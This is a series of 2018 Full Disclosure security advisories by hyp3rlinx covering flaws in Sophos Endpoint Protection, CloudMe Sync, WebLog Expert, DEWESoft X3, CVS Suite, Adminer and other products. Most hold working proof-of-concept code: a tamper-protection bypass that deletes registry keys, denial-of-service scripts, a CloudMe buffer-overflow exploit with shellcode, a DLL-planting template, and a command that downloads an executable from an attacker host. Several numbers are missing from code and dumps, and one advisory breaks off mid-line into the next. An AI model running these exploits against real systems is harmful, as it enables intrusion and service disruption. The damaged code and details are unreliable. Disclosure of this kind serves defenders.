> > Severity:
> > =
> > High
> >
> >
> >
> > Disclosure Timeline:
> > =
> > Vendor Notification: December 4, 2017
> > Vendor Acknowledgement: December 12, 2017
> > Vendor release fixes: March 1, 2018
[FD] CVE-2018-9233 Sophos Endpoint Protection Control Panel v10.7 / Insecure Crypto
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-CONTROL-PANEL-v10.7-INSECURE-CRYPTO-CVE-2018-9233.txt
[+] ISR: Apparition Security
Vendor:
==
www.sophos.com
Product:
===
Sophos Endpoint Protection - Control Panel v10.7
Sophos Endpoint Protection helps secure your workstation by adding
prevention, detection, and response technology on top of your operating
system.
Sophos Endpoint Protection is designed for workstations running Windows and
macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware,
anti-malware, web security, malicious traffic detection, and deep system
cleanup.
Vulnerability Type:
===
Insecure Crypto
CVE Reference:
==
CVE-2018-9233
Security Issue:
Sophos endpoint protection control panel authentication uses weak unsalted
unicoded cryptographic hash (SHA1) function, not using salt allows
attackers that gain access to hash
ability to conduct faster cracking attacks using pre-computed dictionaries,
e.g. rainbow tables. This can potentially result in unauthorized access
that could allow for
changing of settings, whitelist or unquarantine files.
Password and config for Sophos endpoint protection control panel is stored
here:
C:\ProgramData\Sophos\Sophos Anti-Virus\Config\machine.xml
e.g.
SHA1 (Unicode) encoding non salted pass = abc123
true689307D2FC53AF0FB941BC1BB42737CE4F3EF540
Using PHP's sha1 function with "mb_convert_encoding" as UTF-16LE we can
verify.
C:\>php -r "print sha1(mb_convert_encoding('abc123', 'UTF-16LE', 'UTF-8'));"
689307d2fc53af0fb941bc1bb42737ce4f3ef540
Network Access:
===
Local
Severity:
=
Low
Disclosure Timeline:
=
Vendor Notification: December 4, 2017
Vendor Acknowledgement: December 12, 2017
Vendor release fixes: March 1, 2018
Vendor request additional time before disclosing.
additional time has passed.
April 4, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-4863 Sophos Endpoint Protection v10.7 / Tamper Protection Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt
[+] ISR: Apparition Security
Vendor:
=
www.sophos.com
Product:
===
Sophos Endpoint Protection v10.7
Sophos Endpoint Protection helps secure your workstation by adding
prevention, detection, and response technology on top of your operating
system.
Sophos Endpoint Protection is designed for workstations running Windows and
macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware,
anti-malware, web security, malicious traffic detection, and deep system
cleanup.
Vulnerability Type:
===
Tamper Protection Bypass
CVE Reference:
==
CVE-2018-4863
Security Issue:
Sophos Endpoint Protection offers an enhanced tamper protection mechanism
disallowing changes to be made to the Windows registry
by creating and setting a special registry key "SEDEnabled" as follows:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint
Defense\TamperProtection\Config
Create the following registry key:
"SEDEnabled"=dword:0001"
>From "https://community.sophos.com/kb/en-us/124376; documentation:
"You must enable the basic Tamper Protection feature on an endpoint in
order to use the Enhanced Tamper Protection"
However, this protection mechanism can be bypassed by deleting the
following registry key as it is not sufficiently protected.
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint
Defense\"
By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper
Protection" once the system has been rebooted.
Attackers can then create arbitrary registry keys or edit keys and settings
under the protected "tamper" protection config key.
The issue undermines the integrity of the endpoint protection as deleting
this key stops the tamper protect driver from loading.
SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed
customers customers are unaffected.
All SAV OPM Preview subscribers have had the fix since 2018-03-01.
Exploit/POC:
=
Compile the below malicious POC "C" code and run on target, PC will reboot
then we pwn.
gcc -o sophos-poc.exe sophos-poc.c
"sophos-poc.c"
/***SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS
Even with "SEDEnabled"=dword:0001" set in registry to prevent tampering
https://community.sophos.com/kb/en-us/124376
By hyp3rlinx **/
int main(void){
system("reg delete
\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint
Defense\" /f");
system("shutdown -t 0 -r -f");
return 0;
}
Network Access:
===
Local
Severity:
=
High
Disclosure Timeline:
=
Vendor Notification: December 4, 2017
Vendor Acknowledgement: December 12, 2017
Vendor release fixes: March 1, 2018
Vendor request additional time before disclosing.
additional time has passed.
April 4, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] DEWESoft X3 SP1 (64-bit) installer / Remote Internal Command Access - CVE-2018-7756
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt [+] ISR: Apparition Security Vendor: = www.dewesoft.com Product: === DEWESoft X3 SP1 (64-bit) installer - X3 DEWESoft_FULL_X3_SP1_64BIT.exe Vulnerability Type: === Remote Internal Command Access CVE Reference: == CVE-2018-7756 Security Issue: The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run a "SETFIREWALL Off" command. The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install. Internal commands used by "RunExeFile.exe" for which I could not find any documentation. RUN RUNEX GETFIREWALL SETFIREWALL Off KILL USERNAME SHUTDOWN SENDKEYS LIST DWPIPE Exploit/POC: = TELNET x.x.x.x 1999 RUN calc.exe OR Launch the victims browser and send them to website for a drive-by download etc. TELNET x.x.x.x 1999 RUN http://ATTACKER-IP/DOOM.exe Then from the TELNET session execute it from Downloads directory. runexe c:\Users\victim\Downloads\DOOM.exe Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: February 9, 2018 Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018 Inform vendor of disclosure timeline : February 19, 2018 No further replys, update or addressing of the issue by vendor. Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018 March 10, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WebLog Expert Web Server Enterprise v9.4 / Remote Denial Of Service CVE-2018-7582
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-DENIAL-OF-SERVICE.txt [+] ISR: Apparition Security Vendor: === www.weblogexpert.com Product: = WebLog Expert Web Server Enterprise v9.4 WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors: activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers, operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts. Vulnerability Type: === Denial Of Service CVE Reference: == CVE-2018-7582 Security Issue: WebLog Expert Web Server Enterprise 9.4 allows Remote Denial Of Service (daemon crash) via a long HTTP Accept Header to TCP port 9991. (e7c.1750): CLR exception - code e0434352 (first/second chance not available) eax= ebx=06d1d098 ecx=0005 edx= esi=0002 edi= eip=778d016d esp=06d1d048 ebp=06d1d0e4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!NtWaitForMultipleObjects+0x15: 778d016d 83c404 add esp,4 Exploit/POC: = import socket print 'Weblog Expert Server / Denial Of Service' print 'hyp3rlinx' IP='Weblog Expert Server IP' PORT=9991 PAYLOAD="GET /index.html HTTP/1.0 Host: +'IP'+':9991 User-Agent: Mozilla Accept: */*" + "A"*2000+'\r\n\r\n' s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((IP,PORT)) s.send(PAYLOAD) s.close() Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: February 3, 2018 Second attempt : February 17, 2018 March 7, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WebLog Expert Web Server Enterprise v9.4 / Authentication Bypass CVE-2018-7581
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-AUTHENTICATION-BYPASS.txt [+] ISR: Apparition Security Vendor: www.weblogexpert.com Product: WebLog Expert Web Server Enterprise v9.4 WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors: activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers, operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts. Vulnerability Type: === Authentication Bypass CVE Reference: == CVE-2018-7581 Security Issue: The "WebServer.cfg" under "ProgramData\WebLog Expert\WebServer\" used by WebLog Expert Web Server Enterprise 9.4 has weak permissions (BUILTIN\Users:(ID)C), which allows local users to set a cleartext password and login as admin. A standard non Windows Administrator user can edit the 'WebServer.cfg' file under "C:\ProgramData\WebLog Expert\WebServer" set to a cleartext password and login as admin. e.g. C:\ProgramData\WebLog Expert\WebServer>cacls * | more C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg BUILTIN\Users:(ID)C BUILTIN\Administrators:(ID)C NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F Exploit/POC: = Login as a 'Standard' Windows user Comment out the Admin hashed password using ';' then add any cleartext password as follows. [User:admin] Password=1234 ;PasswordHash=3413C538CE5234FB194E82AE1F3954FD2BC848C0 bAllProfiles=1 Now login in as Admin! :) Network Access: === Local Severity: = Medium Disclosure Timeline: = Vendor Notification: March 1, 2018 No replies from previous attempts March 7, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Softros Network Time System Server v2.3.4 / Denial Of Service CVE-2018-7658
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security
Vendor:
=
www.softros.com
https://nts.softros.com/downloads/
Product:
===
Network Time System Server v2.3.4
Both x86/x64 versions
Network Time System provides a solution to system time maintenance
problems. This powerful client/server software enables you to set up a
virtually fail-safe synchronized time environment for networks of any size
and complexity, from small office networks (LAN) to those
maintained at large enterprises (VPN, VLAN, WAN), from single site networks
to those including numerous domains and involving complex
routing techniques. Network Time System allows the creation of a custom
source of precise time in a corporate network environment
establishing an interconnected time synchronization system for each and
every machine and device on the company network.
Vulnerability Type:
===
Denial Of Service
CVE Reference:
==
CVE-2018-7658
Security Issue:
Network Time System (Server) "NTSServerSvc" service listens on Port 7001,
unauthenticated remote attackers can crash the
Server by sending exactly 11 bytes to the target system. Systems which may
depend on critical time synchronization
could then potentially be impacted.
Stack dump:
'''
eax=0320119a ebx=000b ecx=00ff edx= esi=03167040
edi=0050b328
eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0 nv up ei ng nz ac pe
cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=
efl=00010297
NTSServerSvc+0x69a5:
004069a5 880amov byte ptr [edx],cl
ds:0023:=??
Resetting default scope
FAULTING_IP:
NTSServerSvc+69a5
004069a5 880amov byte ptr [edx],cl
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 004069a5 (NTSServerSvc+0x69a5)
ExceptionCode: c005 (Access violation)
'''
Exploit/POC:
=
import socket
#Network Time System (Server) NTSServerSvc.exe v2.3.4
#Softros Systems
#NTS Server service for time synchronization over network
print 'Network Time Server 11 byte Denial Of Service'
print 'by hyp3rlinx'
HOST=raw_input('Network Time Server IP')
PORT=7001
payload='A'*11
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(payload)
s.close()
Network Access:
===
Remote
Severity:
=
Medium
Disclosure Timeline:
=
Vendor Notification: February 10, 2018
Second attempt : February 24, 2018
Request CVE, assigned by Mitre : March 3, 2018
March 5, 2018: Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-7449 SEGGER embOS/IP FTP Server v3.22 / FTP CMDs Denial Of Service
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SEGGER-embOS-FTP-SERVER-v3.22-FTP-COMMANDS-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security
Vendor:
=
www.segger.com
Product:
===
embOS/IP FTP Server v3.22
Vulnerability Type:
===
FTP Commands Denial Of Service
CVE Reference:
==
CVE-2018-7449
Security Issue:
SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial
of service (daemon crash)
via an invalid LIST, STOR, or RETR command.
STOR 666\r\n
LIST\r\n
RETR '+'..\\'*8+'Windows\system.ini\r\n
TELNET x.x.x.x 21
220 Welcome to embOS/IP FTP server
USER anonymous
331 Password required.
PASS anonymous
230 User logged in, proceed.
STOR Bye!
CRASH!!!
Exploit/POC:
=
import socket,time
VICTIM=raw_input('[+]Segger v3.22 FTP Server IP > ')
USR='anonymous'
PWD='anonymous'
CMD="STOR Bye!\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((VICTIM, 21))
print s.recv(1024) # Recieve FTP Banner
time.sleep(1)
s.send("USER " + USR+ "\r\n")
print s.recv(1024)
time.sleep(1)
s.send("PASS "+ PWD+"\r\n") #
print s.recv(1024)
time.sleep(1)
s.send(CMD)
print 'Sent %s' % CMD
s.close()
Network Access:
===
Remote
Severity:
=
Medium
Disclosure Timeline:
=
Vendor Notification: February 17, 2018
Vendor acknowledgement: February 19, 2018
Vendor released fixed version v3.22a : February 23, 2018
March 1, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] DualDesk v20 "Proxy.exe" Server / Denial Of Service - CVE-2018-7583
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DUALDESK-v20-DENIAL-OF-SERVICE.txt [+] ISR: Apparition Security Vendor: === www.dualdesk.com Product: === DualDesk v20 DualDesk is powerful, easy to use remote support software that is a one-time purchase and lets your technical support staff remote assist a PC anywhere on the internet through firewalls in seconds with no configuration. Vulnerability Type: === Denial Of Service CVE Reference: == CVE-2018-7583 Security Issue: Remote unauthenticated attackers can crash the "Proxy.exe" Server component of Dualdesk application which listens on TCP Port 5500 by sending a long string of junk chars. (d24.d60): Security check failure or stack buffer overrun - code c409 (first/second chance not available) eax= ebx=0257f1c0 ecx= edx= esi=0002 edi= eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!NtWaitForMultipleObjects+0x15: 77c6016d 83c404 add esp,4 Exploit/POC: = Start the Dualdesk Run Proxy as Application. C:\>python -c "print 'a'*8000" > crash.txt C:\>type crash.txt | nc.exe localhost 5500 Crash!!! Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: February 4, 2018 Second attempt : February 17, 2018 Request CVE, assigned by Mitre : March 1, 2018 March 1, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-6892 CloudMe Sync <= v1.10.9 Unauthenticated Remote Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security
[+] SSD Beyond Security Submission:
https://blogs.securiteam.com/index.php/archives/3669
Vendor:
=www.cloudme.com
Product:
===
CloudMe Sync <= v1.10.9
(CloudMe_1109.exe)
hash: 0e83351dbf86562a70d1999df7674aa0
CloudMe is a file storage service operated by CloudMe AB that offers
cloud storage, file synchronization and client software.
It features a blue folder that appears on all devices with the same
content, all files are synchronized between devices.
Vulnerability Type:
===
Buffer Overflow
CVE Reference:
==
CVE-2018-6892
Security Issue:
Unauthenticated remote attackers that can connect to the "CloudMe
Sync" client application listening on port , can send a malicious
payload causing
a Buffer Overflow condition. This will result in an attacker
controlling the programs execution flow and allowing arbitrary code
execution on the victims PC.
CloudMe Sync client creates a socket listening on TCP Port (0x22B8)
In Qt5Core:
00564DF1 . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8
00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX
00564DFC . FF15 B8738100 CALL DWORD PTR DS:[<_ZN10QTc>;
Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst
C:\>netstat -ano | findstr
TCP0.0.0.0: 0.0.0.0:0 LISTENING 15504
TCP[::]: [::]:0 LISTENING 15504
Buffer Overflow:
EIP register will be overwritten at about 1075 bytes.
EAX 0001
ECX 76F698DA msvcrt.76F698DA
EDX 0035
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141
Stack Dump:
==
(508.524): Access violation - code c005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for ntdll.dll -
eax= ebx= ecx=41414141 edx=778f353d esi= edi=
eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
Exploitation is very easy as ASLR SafeSEH are all set to false making
the exploit portable and able to work across different operating
systems.
We will therefore use Structured Exceptional Handler overwrite for our exploit.
e.g.
6FE6909D 0x6fe6909d : pop ebx # pop esi # ret 0x20 |
{PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False,
SafeSEH: False, OS: False, v-1.0-
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
00476795 0x00476795 : pop ebx # pop esi # ret 0x20 | startnull
{PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v-1.0-
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
61E7B7F6 0x61e7b7f6 : pop ebx # pop esi # ret 0x20 |
{PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v5.9.0.0
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)
0day Exploit POC:
==
import socket,struct
print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'Discovery/credits: hyp3rlinx'
print 'apparition security\n'
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
ip=raw_input('[+] CloudMe Target IP> ')
nseh="\xEB\x06"+"\x90"*2#JMP
seh=struct.pack('<L',0x61e7b7f6)#POP,POP RET
junk="A"*2232+nseh+seh+sc+"B"*5600
payload=junk+nseh+seh+sc
def PwnMe(ip,payload):
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,))
s.send(payload)
print 'Sending buffer overflow packetz'
raw_input()
if __name__ == '__main__':
PwnMe(ip,payload)
References:
https://www.cloudme.com/en/sync#https://blogs.securiteam.com/index.php/archives/3669
POC Video URL:
=https://vimeo.com/255280060
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
SSD Vulnerability submission: January 17, 2018
Would like to acknowledge Beyond Security’s SSD program for the help
with co-ordination of this vulnerability.
More details can be found on their blog at:
https://blogs.
[FD] CVS Suite 2009R2 Insecure Library Loading CVE-2018-6461
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/CVS-SUITE-2009R2-INSECURE-LIBRARY-LOADING-CVE-2018-6461.txt
[+] ISR: Apparition Security
Vendor:
=march-hare.com
Product:
===
WINCVS 2009R2
CVS Suite is a modern versioning system that combines the power and
stability of CVS with modern easy to use client software and support
for
Configuration Management best practice. As the newest major release of
the world’s most popular versioning system, CVS Suite 2009R2 continues
CVSNT’s blazing pace of innovation with new features and usability enhacements.
Vulnerability Type:
===
Insecure Library Loading
CVE Reference:
==
CVE-2018-6461
Security Issue:
Non privileged user can write files to "C:\ProgramData\March
Hare\myrepo\CVSROOT" to gain authenticated access with the same
privileges
as the current logged on user, in addition they can run arbitrary code
with same privileges as that of the victim.
e.g.
C:\ProgramData\March Hare\myrepo\CVSROOT>cacls * | more
C:\ProgramData\March Hare\myrepo\CVSROOT\CVS Everyone:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
WinCVS:
Attackers can place a malicious DLLs in CVSROOT and wait for CVS user
to run WINCVS, then when browse to a repository in CVSROOT and right
click on
CVSROOT or a CVSROOT file to 'Open in new instance' or Ctrl+F2 then
the attackers DLL will execute.
Attacker supplied DLL e.g. 'python31.dll' will execute if placed on
victims desktop and user initially opens 'wicvs2.exe'.
basically anywhere or repository we can place malicious DLL that they
can browse to should work.
WinMerge 2009 also vulnerable:
If a WinMerge project file is opened from a remote share where
specific attacker supplied DLLs have been placed it will load and
execute it.
vuln DLL(s):
tcl87.dll
python30.dll
python31.dll
Basically anywhere or any repository we can place malicious DLL that
they can browse to should work.
References:
http://march-hare.com/cvspro/vulnwincvs.htm
Exploit/POC:
=
Create "python31.dll"
#include
//gcc -c python31.c
//gcc -shared -o python31.dll python31.o
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
switch (reason) {
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Done!", "hyp3rlinx", MB_OK);
break;
}
return 0;
}
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
Vendor Notification: January 26, 2018
Vendor acknowledgemen: January 27, 2018
Vendor releases fix: February 2, 2018
February 5, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Adminer <= v4.3.1 Server Side Request Forgery
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: apparition security
Vendor:
==www.adminer.org
Product:
Adminer <= v4.3.1
Adminer (formerly phpMinAdmin) is a full-featured database management
tool written in PHP. Conversely to phpMyAdmin, it consist of a
single file ready to deploy to the target server. Adminer is available
for MySQL, PostgreSQL, SQLite, MS SQL, Oracle, Firebird, SimpleDB,
Elasticsearch and MongoDB.
https://github.com/vrana/adminer/releases/
Vulnerability Type:
===
Server Side Request Forgery
CVE Reference:
==
N/A
Security Issue:
Adminer allows unauthenticated connections to be initiated to
arbitrary systems/ports. This vulnerability can be used to potentially
bypass firewalls to
identify internal hosts and perform port scanning of other servers for
reconnaissance purposes. Funny thing is Adminer throttles invalid
login attempts
but allows endless unauthorized HTTP connections to other systems as
long as your not trying to authenticate to Adminer itself.
Situations where Adminer can talk to a server that we are not allowed
to (ACL) and where we can talk to the server hosting Adminer, it can
do recon for us.
Recently in LAN I was firewalled off from a server, however another
server running Adminer I can talk to. Also, that Adminer server can
talk to the target.
Since Adminer suffers from Server-Side Request Forgery, I can scan for
open ports and gather information from that firewalled off protected
server.
This allowed me to not only bypass the ACL but also hide from the
threat detection system (IDS) monitoring east west connections.
However, sysadmins who check the logs on the server hosting Adminer
application will see our port scans.
root@lamp log/apache2# cat other_vhosts_access.log
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:25:11 +] "GET
///?server=TARGET-IP:21= HTTP/1.1" 403 1429 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:24 +] "GET
///?server=TARGET-IP:22= HTTP/1.1" 403 6019 "-" "-"
